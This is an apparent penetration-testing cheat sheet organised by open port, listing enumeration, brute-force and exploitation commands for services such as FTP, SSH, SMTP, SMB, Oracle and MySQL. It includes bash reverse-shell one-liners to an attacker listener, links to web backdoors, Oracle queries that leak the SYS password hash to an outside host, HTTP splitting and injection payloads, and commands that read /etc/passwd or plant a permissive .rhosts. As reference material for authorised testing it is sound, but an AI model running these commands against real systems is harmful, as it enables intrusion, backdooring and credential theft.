· 7 years ago · Dec 03, 2018, 04:00 PM
1• FTP port 21 open
2 â—‹ Fingerprint server
3 § telnet ip_address 21 (Banner grab)
4 § Run command ftp ip_address
5 § ftp@example.com
6 § Check for anonymous access
7 â–¡ ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
8 â—‹ Password guessing
9 § Hydra brute force
10 § medusa
11 § Brutus
12 â—‹ Examine configuration files
13 § ftpusers
14 § ftp.conf
15 § proftpd.conf
16 â—‹ MiTM
17 § pasvagg.pl
18• SSH port 22 open
19 â—‹ Fingerprint server
20 § telnet ip_address 22 (banner grab)
21 § scanssh
22 â–¡ scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
23 â—‹ Password guessing
24 § ssh root@ip_address
25 § guess-who
26 â–¡ ./b -l username -h ip_address -p 22 -2 < password_file_location
27 § Hydra brute force
28 § brutessh
29 § Ruby SSH Bruteforcer
30 â—‹ Examine configuration files
31 § ssh_config
32 § sshd_config
33 § authorized_keys
34 § ssh_known_hosts
35 § .shosts
36 â—‹ SSH Client programs
37 § tunnelier
38 § winsshd
39 § putty
40 § winscp
41• Telnet port 23 open
42 â—‹ Fingerprint server
43 § telnet ip_address
44 â–¡ Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
45 § telnetfp
46 â—‹ Password Attack
47 § Common passwords
48 § Hydra brute force
49 § Brutus
50 § telnet -l "-froot" hostname (Solaris 10+)
51 â—‹ Examine configuration files
52 § /etc/inetd.conf
53 § /etc/xinetd.d/telnet
54 § /etc/xinetd.d/stelnet
55• Sendmail Port 25 open
56 â—‹ Fingerprint server
57 § telnet ip_address 25 (banner grab)
58 â—‹ Mail Server Testing
59 § Enumerate users
60 â–¡ VRFY username (verifies if username exists - enumeration of accounts)
61 â–¡ EXPN username (verifies if username is valid - enumeration of accounts)
62 § Mail Spoof Test
63 â–¡ HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
64 § Mail Relay Test
65 â–¡ HELO anything
66 ® Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
67 ® Unknown domain - mail from: <user@unknown_domain>
68 ® Domain not present - mail from: <user@localhost>
69 ® Domain not supplied - mail from: <user>
70 ® Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
71 ® Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
72 ® Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
73 ® User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
74 ® Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
75 ® Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
76 â—‹ Examine Configuration Files
77 § sendmail.cf
78 § submit.cf
79• DNS port 53 open
80 â—‹ Fingerprint server/ service
81 § host
82 □ host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
83 § nslookup
84 â–¡ nslookup [ -option ... ] [ host-to-find | - [ server ]]
85 § dig
86 â–¡ dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
87 § whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
88 â—‹ DNS Enumeration
89 § Bile Suite
90 â–¡ perl BiLE.pl [website] [project_name]
91 â–¡ perl BiLE-weigh.pl [website] [input file]
92 â–¡ perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
93 â–¡ perl vet-mx.pl [input file] [true domain file] [output file]
94 â–¡ perl exp-tld.pl [input file] [output file]
95 â–¡ perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
96 â–¡ perl qtrace.pl [ip_address_file] [output_file]
97 â–¡ perl jarf-rev [subnetblock] [nameserver]
98 § txdns
99 â–¡ txdns -rt -t domain_name
100 â–¡ txdns -x 50 -bb domain_name
101 â–¡ txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
102 â—‹ Examine Configuration Files
103 § host.conf
104 § resolv.conf
105 § named.conf
106• TFTP port 69 open
107 â—‹ TFTP Enumeration
108 § tftp ip_address PUT local_file
109 § tftp ip_address GET conf.txt (or other files)
110 § Solarwinds TFTP server
111 § tftp – i <IP> GET /etc/passwd (old Solaris)
112 â—‹ TFTP Bruteforcing
113 § TFTP bruteforcer
114 § Cisco-Torch
115• Finger Port 79 open
116 â—‹ User enumeration
117 § finger 'a b c d e f g h' @example.com
118 § finger admin@example.com
119 § finger user@example.com
120 § finger 0@example.com
121 § finger .@example.com
122 § finger **@example.com
123 § finger test@example.com
124 § finger @example.com
125 â—‹ Command execution
126 § finger "|/bin/id@example.com"
127 § finger "|/bin/ls -a /@example.com"
128 â—‹ Finger Bounce
129 § finger user@host@victim
130 § finger @internal@external
131• Web Ports 80, 8080 etc. open
132 â—‹ Fingerprint server
133 § Telnet ip_address port
134 § Firefox plugins
135 â–¡ All
136 ® firecat
137 â–¡ Specific
138 ® add n edit cookies
139 ® asnumber
140 ® header spy
141 ® live http headers
142 ® shazou
143 ® web developer
144 â—‹ Crawl website
145 § lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
146 § httprint
147 § Metagoofil
148 â–¡ metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
149 â—‹ Web Directory enumeration
150 § Nikto
151 â–¡ nikto [-h target] [options]
152 § DirBuster
153 § Wikto
154 § Goolag Scanner
155 â—‹ Vulnerability Assessment
156 § Manual Tests
157 â–¡ Default Passwords
158 â–¡ Install Backdoors
159 ® ASP
160 â—Š http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
161 ® Assorted
162 â—Š http://michaeldaw.org/projects/web-backdoor-compilation/
163 â—Š http://open-labs.org/hacker_webkit02.tar.gz
164 ® Perl
165 â—Š http://home.arcor.de/mschierlm/test/pmsh.pl
166 â—Š http://pentestmonkey.net/tools/perl-reverse-shell/
167 â—Š http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
168 ® PHP
169 â—Š http://php.spb.ru/remview/
170 â—Š http://pentestmonkey.net/tools/php-reverse-shell/
171 â—Š http://pentestmonkey.net/tools/php-findsock-shell/
172 ® Python
173 â—Š http://matahari.sourceforge.net/
174 ® TCL
175 â—Š http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
176 ® Bash Connect Back Shell
177 â—Š GnuCitizen
178 } Atttack Box: nc -l -p Port -vvv
179 } Victim: $ exec 5<>/dev/tcp/IP_Address/Port
180Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
181 â—Š Neohapsis
182 } Atttack Box: nc -l -p Port -vvv
183 } Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
184Victim: $ exec 1>&0 # Next we copy stdin to stdout
185Victim: $ exec 2>&0 # And finally stdin to stderr
186Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
187 â–¡ Method Testing
188 ® nc IP_Adress Port
189 â—Š HEAD / HTTP/1.0
190 â—Š OPTIONS / HTTP/1.0
191 â—Š PROPFIND / HTTP/1.0
192 â—Š TRACE / HTTP/1.1
193 â—Š PUT http://Target_URL/FILE_NAME
194 â—Š POST http://Target_URL/FILE_NAME HTTP/1.x
195 â–¡ Upload Files
196 ® curl
197 â—Š curl -u <username:password> -T file_to_upload <Target_URL>
198 â—Š curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
199 ® put.pl
200 â—Š put.pl -h target -r /remote_file_name -f local_file_name
201 ® webdav
202 â—Š cadaver
203 â–¡ View Page Source
204 ® Hidden Values
205 ® Developer Remarks
206 ® Extraneous Code
207 ® Passwords!
208 â–¡ Input Validation Checks
209 ® NULL or null
210 â—Š Possible error messages returned.
211 ® ' , " , ; , <!
212 â—Š Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
213 ® – , = , + , "
214 â—Š Used to craft SQL Injection queries.
215 ® ‘ , &, ! , ¦ , < , >
216 â—Š Used to find command execution vulnerabilities.
217 ® "><script>alert(1)</script>
218 â—Š Basic Cross-Site Scripting Checks.
219 ® %0d%0a
220 â—Š Carriage Return (%0d) Line Feed (%0a)
221 } HTTP Splitting
222 – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
223 w i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
224 } Cache Poisoning
225 – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
226 ® %7f , %ff
227 â—Š byte-length overflows; maximum 7- and 8-bit values.
228 ® -1, other
229 â—Š Integer and underflow vulnerabilities.
230 ® %n , %x , %s
231 â—Š Testing for format string vulnerabilities.
232 ® ../
233 â—Š Directory Traversal Vulnerabilities.
234 ® % , _, *
235 â—Š Wildcard characters can sometimes present DoS issues or information disclosure.
236 ® Ax1024+
237 â—Š Overflow vulnerabilities.
238 â–¡ Automated table and column iteration
239 ® orderby.py
240 â—Š ./orderby.py www.site.com/index.php?id=
241 ® d3sqlfuzz.py
242 â—Š ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
243 § Vulnerability Scanners
244 â–¡ Acunetix
245 â–¡ Grendelscan
246 â–¡ NStealth
247 â–¡ Obiwan III
248 â–¡ w3af
249 § Specific Applications/ Server Tools
250 â–¡ Domino
251 ® dominoaudit
252 â—Š dominoaudit.pl [options] -h <IP>
253 â–¡ Joomla
254 ® cms_few
255 â—Š ./cms.py <site-name>
256 ® joomsq
257 â—Š ./joomsq.py <IP>
258 ® joomlascan
259 ◊ ./joomlascan.py <site> <options>  [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
260 ® joomscan
261 â—Š ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
262 ® jscan
263 â—Š jscan.pl -f hostname
264 â—Š (shell.txt required)
265 â–¡ aspaudit.pl
266 ® asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
267 â–¡ Vbulletin
268 ® vbscan.py
269 â—Š vbscan.py <host> <port> -v
270 â—Š vbscan.py -update
271 â–¡ ZyXel
272 ® zyxel-bf.sh
273 ® snmpwalk
274 â—Š snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
275 ® snmpget
276 â—Š snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
277 â—‹ Proxy Testing
278 § Burpsuite
279 § Crowbar
280 § Interceptor
281 § Paros
282 § Requester Raw
283 § Suru
284 § WebScarab
285 â—‹ Examine configuration files
286 § Generic
287 â–¡ Examine httpd.conf/ windows config files
288 § JBoss
289 â–¡ JMX Console http://<IP>:8080/jmxconcole/
290 ® War File
291 § Joomla
292 â–¡ configuration.php
293 â–¡ diagnostics.php
294 â–¡ joomla.inc.php
295 â–¡ config.inc.php
296 § Mambo
297 â–¡ configuration.php
298 â–¡ config.inc.php
299 § Wordpress
300 â–¡ setup-config.php
301 â–¡ wp-config.php
302 § ZyXel
303 â–¡ /WAN.html (contains PPPoE ISP password)
304 â–¡ /WLAN_General.html and /WLAN.html (contains WEP key)
305 â–¡ /rpDyDNS.html (contains DDNS credentials)
306 â–¡ /Firewall_DefPolicy.html (Firewall)
307 â–¡ /CF_Keyword.html (Content Filter)
308 â–¡ /RemMagWWW.html (Remote MGMT)
309 â–¡ /rpSysAdmin.html (System)
310 â–¡ /LAN_IP.html (LAN)
311 â–¡ /NAT_General.html (NAT)
312 â–¡ /ViewLog.html (Logs)
313 â–¡ /rpFWUpload.html (Tools)
314 â–¡ /DiagGeneral.html (Diagnostic)
315 â–¡ /RemMagSNMP.html (SNMP Passwords)
316 â–¡ /LAN_ClientList.html (Current DHCP Leases)
317 â–¡ Config Backups
318 ® /RestoreCfg.html
319 ® /BackupCfg.html
320 ® Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
321 â—Š ZyXEL Config Reader
322 â—‹ Examine web server logs
323 § c:\winnt\system32\Logfiles\W3SVC1
324 â–¡ awk -F " " '{print $3,$11} filename | sort | uniq
325 â—‹ References
326 § White Papers
327 â–¡ Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
328 â–¡ Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
329 â–¡ Blind Security Testing - An Evolutionary Approach
330 â–¡ Command Injection in XML Signatures and Encryption
331 â–¡ Input Validation Cheat Sheet
332 â–¡ SQL Injection Cheat Sheet
333 § Books
334 â–¡ Hacking Exposed Web 2.0
335 â–¡ Hacking Exposed Web Applications
336 â–¡ The Web Application Hacker's Handbook
337 â—‹ Exploit Frameworks
338 § Brute-force Tools
339 â–¡ Acunetix
340 § Metasploit
341 § w3af
342• Portmapper port 111 open
343 â—‹ rpcdump.py
344 § rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
345 â—‹ rpcinfo
346 § rpcinfo [options] IP_Address
347• NTP Port 123 open
348 â—‹ NTP Enumeration
349 § ntpdc -c monlist IP_ADDRESS
350 § ntpdc -c sysinfo IP_ADDRESS
351 § ntpq
352 â–¡ host
353 â–¡ hostname
354 â–¡ ntpversion
355 â–¡ readlist
356 â–¡ version
357 â—‹ Examine configuration files
358 § ntp.conf
359• NetBIOS Ports 135-139,445 open
360 â—‹ nmap 192.168.0.101 --script=msrpc-enum
361 â—‹ msf > use exploit/windows/dcerpc/ms03_026_dcom
362 â—‹ smbclient -L 192.168.1.102
363smbclient //192.168.1.106/tmp
364smbclient \\\\192.168.1.105\\ipc$ -U john
365smbclient //192.168.1.105/ipc$ -U john
366 â—‹ NetBIOS enumeration
367 § Enum
368 â–¡ enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
369 § Null Session
370 â–¡ net use \\192.168.1.1\ipc$ "" /u:""
371 ® net view \\ip_address
372 ® Dumpsec
373 § Smbclient
374 â–¡ smbclient -L //server/share password options
375 § Superscan
376 â–¡ Enumeration tab.
377 § user2sid/sid2user
378 § Winfo
379 â—‹ NetBIOS brute force
380 § Hydra
381 § Brutus
382 § Cain & Abel
383 § getacct
384 § NAT (NetBIOS Auditing Tool)
385 â—‹ Examine Configuration Files
386 § Smb.conf
387 § lmhosts
388• SNMP port 161 open
389 â—‹ Default Community Strings
390 § public
391 § private
392 § cisco
393 â–¡ cable-docsis
394 â–¡ ILMI
395 â—‹ MIB enumeration
396 § Windows NT
397 â–¡ .1.3.6.1.2.1.1.5 Hostnames
398 â–¡ .1.3.6.1.4.1.77.1.4.2 Domain Name
399 â–¡ .1.3.6.1.4.1.77.1.2.25 Usernames
400 â–¡ .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
401 â–¡ .1.3.6.1.4.1.77.1.2.27 Share Information
402 § Solarwinds MIB walk
403 § Getif
404 § snmpwalk
405 â–¡ snmpwalk -v <Version> -c <Community string> <IP>
406 § Snscan
407 § Applications
408 â–¡ ZyXel
409 ® snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
410 ® snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
411 â—‹ SNMP Bruteforce
412 § onesixtyone
413 â–¡ onesixytone -c SNMP.wordlist <IP>
414 § cat
415 â–¡ ./cat -h <IP> -w SNMP.wordlist
416 § Solarwinds SNMP Brute Force
417 § ADMsnmp
418 â—‹ Examine SNMP Configuration files
419 § snmp.conf
420 § snmpd.conf
421 § snmp-config.xml
422• LDAP Port 389 Open
423 â—‹ ldap enumeration
424 § ldapminer
425 â–¡ ldapminer -h ip_address -p port (not required if default) -d
426 § luma
427 â–¡ Gui based tool
428 § ldp
429 â–¡ Gui based tool
430 § openldap
431 â–¡ ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
432 â–¡ ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
433 â–¡ ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
434 â–¡ ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
435 â–¡ ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
436 â—‹ ldap brute force
437 § bf_ldap
438 â–¡ bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
439 § K0ldS
440 § LDAP_Brute.pl
441 â—‹ Examine Configuration Files
442 § General
443 â–¡ containers.ldif
444 â–¡ ldap.cfg
445 â–¡ ldap.conf
446 â–¡ ldap.xml
447 â–¡ ldap-config.xml
448 â–¡ ldap-realm.xml
449 â–¡ slapd.conf
450 § IBM SecureWay V3 server
451 â–¡ V3.sas.oc
452 § Microsoft Active Directory server
453 â–¡ msadClassesAttrs.ldif
454 § Netscape Directory Server 4
455 â–¡ nsslapd.sas_at.conf
456 â–¡ nsslapd.sas_oc.conf
457 § OpenLDAP directory server
458 â–¡ slapd.sas_at.conf
459 â–¡ slapd.sas_oc.conf
460 § Sun ONE Directory Server 5.1
461 â–¡ 75sas.ldif
462• PPTP/L2TP/VPN port 500/1723 open
463 â—‹ Enumeration
464 § ike-scan
465 § ike-probe
466 â—‹ Brute-Force
467 § ike-crack
468 â—‹ Reference Material
469 § PSK cracking paper
470 § SecurityFocus Infocus
471 § Scanning a VPN Implementation
472• Modbus port 502 open
473 â—‹ modscan
474• rlogin port 513 open
475 â—‹ Rlogin Enumeration
476 § Find the files
477 â–¡ find / -name .rhosts
478 â–¡ locate .rhosts
479 § Examine Files
480 â–¡ cat .rhosts
481 § Manual Login
482 â–¡ rlogin hostname -l username
483 â–¡ rlogin <IP>
484 § Subvert the files
485 â–¡ echo ++ > .rhosts
486 â—‹ Rlogin Brute force
487 § Hydra
488• rsh port 514 open
489 â—‹ Rsh Enumeration
490 § rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
491 â—‹ Rsh Brute Force
492 § rsh-grind
493 § Hydra
494 § medusa
495• SQL Server Port 1433 1434 open
496 â—‹ SQL Enumeration
497 § piggy
498 § SQLPing
499 â–¡ sqlping ip_address/hostname
500 § SQLPing2
501 § SQLPing3
502 § SQLpoke
503 § SQL Recon
504 § SQLver
505 â—‹ SQL Brute Force
506 § SQLPAT
507 â–¡ sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
508 â–¡ sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
509 § SQL Dict
510 § SQLAT
511 § Hydra
512 § SQLlhf
513 § ForceSQL
514• Citrix port 1494 open
515 â—‹ Citrix Enumeration
516 § Default Domain
517 § Published Applications
518 â–¡ ./citrix-pa-scan {IP_address/file | - | random} [timeout]
519 â–¡ citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
520 â—‹ Citrix Brute Force
521 § bforce.js
522 § connect.js
523 § Citrix Brute-forcer
524 § Reference Material
525 â–¡ Hacking Citrix - the legitimate backdoor
526 â–¡ Hacking Citrix - the forceful way
527• Oracle Port 1521 Open
528 â—‹ Oracle Enumeration
529 § oracsec
530 § Repscan
531 § Sidguess
532 § Scuba
533 § DNS/HTTP Enumeration
534 â–¡ SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
535 â–¡ SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
536 § WinSID
537 § Oracle default password list
538 § TNSVer
539 â–¡ tnsver host [port]
540 § TCP Scan
541 § Oracle TNSLSNR
542 â–¡ Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
543 § TNSCmd
544 â–¡ perl tnscmd.pl -h ip_address
545 â–¡ perl tnscmd.pl version -h ip_address
546 â–¡ perl tnscmd.pl status -h ip_address
547 â–¡ perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
548 § LSNrCheck
549 § Oracle Security Check (needs credentials)
550 § OAT
551 â–¡ sh opwg.sh -s ip_address
552 â–¡ opwg.bat -s ip_address
553 â–¡ sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
554 § OScanner
555 â–¡ sh oscanner.sh -s ip_address
556 â–¡ oscanner.exe -s ip_address
557 â–¡ sh reportviewer.sh oscanner_saved_file.xml
558 â–¡ reportviewer.exe oscanner_saved_file.xml
559 § NGS Squirrel for Oracle
560 § Service Register
561 â–¡ Service-register.exe ip_address
562 § PLSQL Scanner 2008
563 â—‹ Oracle Brute Force
564 § OAK
565 â–¡ ora-getsid hostname port sid_dictionary_list
566 â–¡ ora-auth-alter-session host port sid username password sql
567 â–¡ ora-brutesid host port start
568 â–¡ ora-pwdbrute host port sid username password-file
569 â–¡ ora-userenum host port sid userlistfile
570 â–¡ ora-ver -e (-f -l -a) host port
571 § breakable (Targets Application Server Port)
572 â–¡ breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
573 § SQLInjector (Targets Application Server Port)
574 â–¡ sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
575 â–¡ sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
576 § Check Password
577 § orabf
578 â–¡ orabf [hash]:[username] [options]
579 § thc-orakel
580 â–¡ Cracker
581 â–¡ Client
582 â–¡ Crypto
583 § DBVisualisor
584 â–¡ Sql scripts from pentest.co.uk
585 â–¡ Manual sql input of previously reported vulnerabilties
586 â—‹ Oracle Reference Material
587 § Understanding SQL Injection
588 § SQL Injection walkthrough
589 § SQL Injection by example
590 § Advanced SQL Injection in Oracle databases
591 § Blind SQL Injection
592 § SQL Cheatsheets
593 â–¡ http://ha.ckers.org/sqlinjection
594http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
595http://www.0x000000.com/?i=14
596http://pentestmonkey.net/Â
597• NFS Port 2049 open
598 â—‹ NFS Enumeration
599 § showmount -e hostname/ip_address
600 § mount -t nfs ip_address:/directory_found_exported /local_mount_point
601 â—‹ NFS Brute Force
602 § Interact with NFS share and try to add/delete
603 § Exploit and Confuse Unix
604 â—‹ Examine Configuration Files
605 § /etc/exports
606 § /etc/lib/nfs/xtab
607• Compaq/HP Insight Manager Port 2301,2381open
608 â—‹ HP Enumeration
609 § Authentication Method
610 â–¡ Host OS Authentication
611 â–¡ Default Authentication
612 ® Default Passwords
613 § Wikto
614 § Nstealth
615 â—‹ HP Bruteforce
616 § Hydra
617 § Acunetix
618 â—‹ Examine Configuration Files
619 § path.properties
620 § mx.log
621 § CLIClientConfig.cfg
622 § database.props
623 § pg_hba.conf
624 § jboss-service.xml
625 § .namazurc
626• MySQL port 3306 open
627 â—‹ Enumeration
628 § nmap -A -n -p3306 <IP Address>
629 § nmap -A -n -PN --script:ALL -p3306 <IP Address>
630 § telnet IP_Address 3306
631 § use test; select * from test;
632 § To check for other DB's -- show databases
633 â—‹ Administration
634 § MySQL Network Scanner
635 § MySQL GUI Tools
636 § mysqlshow
637 § mysqlbinlog
638 â—‹ Manual Checks
639 § Default usernames and passwords
640 â–¡ username: root password:
641 â–¡ testing
642 ® mysql -h <Hostname> -u root
643 ® mysql -h <Hostname> -u root
644 ® mysql -h <Hostname> -u root@localhost
645 ® mysql -h <Hostname>
646 ® mysql -h <Hostname> -u ""@localhost
647 § Configuration Files
648 â–¡ Operating System
649 ® windows
650 â—Š config.ini
651 â—Š my.ini
652 } windows\my.ini
653 } winnt\my.ini
654 â—Š <InstDir>/mysql/data/
655 ® unix
656 â—Š my.cnf
657 } /etc/my.cnf
658 } /etc/mysql/my.cnf
659 } /var/lib/mysql/my.cnf
660 } ~/.my.cnf
661 } /etc/my.cnf
662 â–¡ Command History
663 ® ~/.mysql.history
664 â–¡ Log Files
665 ® connections.log
666 ® update.log
667 ® common.log
668 â–¡ To run many sql commands at once -- mysql -u username -p < manycommands.sql
669 â–¡ MySQL data directory (Location specified in my.cnf)
670 ® Parent dir = data directory
671 ® mysql
672 ® test
673 ® information_schema (Key information in MySQL)
674 â—Š Complete table list -- select table_schema,table_name from tables;
675 â—Š Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
676 â—Š File privileges -- select user,file_priv from mysql.user where user='root';
677 â—Š Version -- select version();
678 â—Š Load a specific file -- SELECT LOAD_FILE('FILENAME');
679 â–¡ SSL Check
680 ® mysql> show variables like 'have_openssl';
681 â—Š If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
682 § Privilege Escalation
683 â–¡ Current Level of access
684 ® mysql>select user();
685 ® mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
686 â–¡ Access passwords
687 ® mysql> use mysql
688 ® mysql> select user,password from user;
689 â–¡ Create a new user and grant him privileges
690 ® mysql>create user test identified by 'test';
691 ® mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
692 â–¡ Break into a shell
693 ® mysql> \! cat /etc/passwd
694 ® mysql> \! bash
695 â—‹ SQL injection
696 § mysql-miner.pl
697 â–¡ mysql-miner.pl http://target/ expected_string database
698 § http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
699 § http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
700 â—‹ References.
701 § Design Weaknesses
702 â–¡ MySQL running as root
703 â–¡ Exposed publicly on Internet
704 § http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
705 § http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
706• RDesktop port 3389 open
707 â—‹ Rdesktop Enumeration
708 § Remote Desktop Connection
709 â—‹ Rdestop Bruteforce
710 § TSGrinder
711 â–¡ tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
712 § Tscrack
713• Sybase Port 5000+ open
714 â—‹ Sybase Enumeration
715 § sybase-version ip_address from NGS
716 â—‹ Sybase Vulnerability Assessment
717 § Use DBVisualiser
718 â–¡ Sybase Security checksheet
719 ® Copy output into excel spreadsheet
720 ® Evaluate mis-configured parameters
721 â–¡ Manual sql input of previously reported vulnerabilties
722 ® Advanced SQL Injection in SQL Server
723 ® More Advanced SQL Injection
724 § NGS Squirrel for Sybase
725• SIP Port 5060 open
